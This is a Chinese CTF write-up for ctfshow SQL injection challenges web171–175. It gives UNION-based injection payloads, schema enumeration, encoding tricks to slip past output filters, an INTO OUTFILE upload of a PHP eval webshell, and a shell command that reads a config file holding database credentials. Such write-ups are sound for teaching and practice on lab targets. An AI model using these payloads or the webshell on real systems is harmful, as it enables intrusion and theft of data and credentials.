CTFSHOW web入门 sql注入 无过滤注入 web171-175

目录

web171

web172

web173

web174

web175


web171

select 查询语句

//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

尝试万能密码 id=1'or'1'='1 ,进行查询,发现查询结果是数据库中全部内容,成功获得flag

 CTFSHOW web入门 sql注入 无过滤注入 web171-175_第1张图片

//方法二:输入 9999'or id='26  访问第26行的flag

web172

页面提示:

CTFSHOW web入门 sql注入 无过滤注入 web171-175_第2张图片

进行sql注入测试:

1.输入id=1 正常获得查询结果

2.输入 id=1'or'1'='1  正常获得查询结果,非注入点

 3.输入 id=1' order by 2 --+(正常查询)/1' order by 3 --+(报错) 获得返回列数为两列

4.输入 id=1' union select 1,2 --+,得知注入点为1和2

 5.进行后续爆库、爆表、爆列名等步骤

1' union select database(),version()--+
#ctfshow_web   10.3.18-MariaDB
1' union select 1,(select group_concat(schema_name) from information_schema.schemata) --+
#information_schema,test,mysql,performance_schema,ctfshow_web
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web') --+
#ctfshow_user,ctfshow_user2
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user') --+
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2') --+
#id,username,password
1' union select group_concat(username),group_concat(password) from ctfshow_web.ctfshow_user --+
#flag  flag is not here
1' union select group_concat(username),group_concat(password) from ctfshow_web.ctfshow_user2 --+
#获得 flag  ctfshow{d12bc448-c477-4342-a2f6-fd365e369aef}

//方法二:

9999' union select id,password from ctfshow_user2 where username='flag

web173

CTFSHOW web入门 sql注入 无过滤注入 web171-175_第3张图片

查询过程中过滤关键词flag,不能直接查询到flag数据

使用base64加密、HEX加密,读取flag信息

1' union select 1,2,(select to_base64(password) from ctfshow_user3 where username='flag')--+
1' union select 1,2,(select hex(password) from ctfshow_user3 where username='flag')--+

解密字符串得flag 

//方法二:

9999' union select b.id,hex(b.username),b.password from ctfshow_user3 as b where b.username='flag

web174

CTFSHOW web入门 sql注入 无过滤注入 web171-175_第4张图片

/flag|[0-9]/i 查询过程不能出现flag和数字0-9

(学习大佬们的解法)整理如下:

1.username/password使用base64加密后,使用@A-@J表示0-9,再解密

[get]payload:0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(username),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J"),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username="flag" --+

[GET]PAYLOAD:
?id=0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(username),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J"),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username="flag" --+

得查询结果:

Y@CRmc@Bhvd@CsxYzk@JM@BQ@JNC@AhNWFiLTQwODktODE@CNC@J@BNzdlNTc@EODRjMTl@I

使用脚本进行解密:

import base64

flag64 = "Y@CRmc@Bhvd@CsxYzk@JM@BQ@JNC@AhNWFiLTQwODktODE@CNC@J@BNzdlNTc@EODRjMTl@I"

flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace("@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")

print(base64.b64decode(flag))

运行结果得flag:

ctfshow{1c943d44-a5ab-4089-8174-677e57984c19}

2.password使用16进制(HEX)加密后,使用小写q~p表示0-9数字,再使用脚本解密

[get]payload:1' union select 'q',(select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','q'),'2','w'),'3','e'),'4','r'),'5','t'),'6','y'),'7','u'),'8','i'),'9','o'),'0','p') from ctfshow_user4 where username='flag')--+

[get]Payload:
1' union select 'q',(select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','q'),'2','w'),'3','e'),'4','r'),'5','t'),'6','y'),'7','u'),'8','i'),'9','o'),'0','p') from ctfshow_user4 where username='flag')--+

查询结果:yeuryyueyiyFuuuBeqyeeoereeyrererwDyqetyqywwDerepeieowDeieqeuerwDeyeueuyteteueoeieryeeqeouD

使用mysql解密脚本:

select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace('yeuryyueyiyFuuuBeqyeeoereeyrererwDyqetyqywwDerepeieowDeieqeuerwDeyeueuyteteueoeieryeeqeouD','q','1'),'w','2'),'e','3'),'r','4'),'t','5'),'y','6'),'u','7'),'i','8'),'o','9'),'p','0');

在线运行SQL

在线sql编译结果:

63746673686F777B31633934336434342D613561622D343038392D383137342D3637376535373938346331397D

最后16进制解密:ctfshow{1c943d44-a5ab-4089-8174-677e57984c19}

3.查询语句使用URL加密,在命令行输入加密查询语句后,将flag中替换符改回数字,获得flag

查询语句:9999' union select 'q',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*'),'9','('),'0',')') from ctfshow_user4 where username='flag

URL加密:%39%39%39%39%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%27%71%27%2c%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%72%65%70%6c%61%63%65%28%70%61%73%73%77%6f%72%64%2c%27%31%27%2c%27%21%27%29%2c%27%32%27%2c%27%40%27%29%2c%27%33%27%2c%27%23%27%29%2c%27%34%27%2c%27%24%27%29%2c%27%35%27%2c%27%25%27%29%2c%27%36%27%2c%27%5e%27%29%2c%27%37%27%2c%27%26%27%29%2c%27%38%27%2c%27%2a%27%29%2c%27%39%27%2c%27%28%27%29%2c%27%30%27%2c%27%29%27%29%20%66%72%6f%6d%20%63%74%66%73%68%6f%77%5f%75%73%65%72%34%20%77%68%65%72%65%20%75%73%65%72%6e%61%6d%65%3d%27%66%6c%61%67

web175

CTFSHOW web入门 sql注入 无过滤注入 web171-175_第5张图片

过滤ASCII0-127的字符

1.将flag查询结果传入1.txt,访问url/1.txt文件得flag

查询语句:1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--

2.将一句话木马传入1.php,使用蚁剑链接后,访问数据库,查询flag

查询语句:99' union select 1,"" into outfile '/var/www/html/1.php
burp-decoder--->base64加密一句话木马,用url加密表示
payload:99' union select 1,from_base64("%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b") into outfile '/var/www/html/1.php

CTFSHOW web入门 sql注入 无过滤注入 web171-175_第6张图片

1.php传入成功

使用蚁剑链接shell,并链接数据库(列表右键,选择database,连接)

查询表名,得flag

CTFSHOW web入门 sql注入 无过滤注入 web171-175_第7张图片

 查询数据库密码:system("tac ./api/config.php");

 

你可能感兴趣的:(ctfshow-web入门,web安全)